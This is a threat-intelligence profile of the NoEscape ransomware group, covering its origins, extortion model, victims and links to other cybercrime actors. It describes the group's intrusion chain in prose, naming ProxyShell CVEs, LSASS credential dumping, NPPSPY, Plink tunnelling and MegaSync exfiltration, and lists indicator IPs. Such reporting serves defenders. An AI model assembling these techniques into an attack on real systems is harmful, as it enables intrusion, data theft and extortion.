NoEscape

NoEscape is a ransomware-as-a-service (RaaS) operation first observed being advertised on a dark web forum in May 2023. Reporting in the provided content describes it as financially motivated, using double extortion through file encryption and data exfiltration, with additional extortion options including DDoS/spam services and call-center support. Multiple sources in the content state NoEscape is believed to be a spin-off or rebrand of the former Avaddon ransomware group.

Observed tradecraft includes exploitation of public-facing Microsoft Exchange servers via ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), webshell deployment, PowerShell-based Microsoft Defender exclusions, credential dumping from LSASS, and lateral movement primarily via RDP using valid domain credentials. In one NCC Group case, operators also tunneled RDP over SSH using PuTTY Link (Plink) to 172.93.181[.]238, leveraged existing TeamViewer access, exfiltrated data with MegaSync.exe to Mega cloud storage, and executed the encryptor via a scheduled task named "SystemUpdate." The content also describes a separate NGO intrusion in which NoEscape operators allegedly purchased previously established access to an unpatched on-premises Exchange environment, used the NPPSPY credential-theft technique via a malicious network provider DLL, installed AnyDesk for persistence, performed enumeration with Nmap/Zenmap and PowerView, and likely exfiltrated data to Mega. The ransomware encryptor was reported to target files on the C:\ drive while excluding numerous extensions.

The content links NoEscape to victim extortion and public leak-site activity. It states the victim portal reportedly listed 89 victims at the time of one report, with the first victim posted on 14 June 2023. Mentioned incidents include a June 2023 claim by NoEscape that it breached the University of Hawaii and stole 65 GB of sensitive data, and reporting tying NoEscape to an October 2023 attack involving the Order of Psychologists of the Lombardy Region, where data was allegedly exfiltrated and later published after ransom non-payment.

NoEscape appears in broader ransomware ecosystem reporting as one of the RaaS programs advertised on the RAMP cybercrime forum. The content also notes overlap between ransomware ecosystems: LockBitSupp encouraged ALPHV/BlackCat and NoEscape affiliates to use the LockBit leak site in late 2023, and Mikhail Matveev was reported to have worked as an affiliate for NoEscape in addition to several other ransomware groups. Separately, FBI reporting cited in the content states Iranian actors partnered with affiliates of NoEscape, Ransomhouse, and ALPHV and took a percentage of ransom payments.

Known indicators and artifacts directly mentioned in the content include CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (ProxyShell); Mega-related IP 66.203.125[.]14; Plink remote endpoint 172.93.181[.]238; and a Meterpreter stager communicating with 103.112.232.44:443 in a case later attributed to NoEscape operators purchasing access.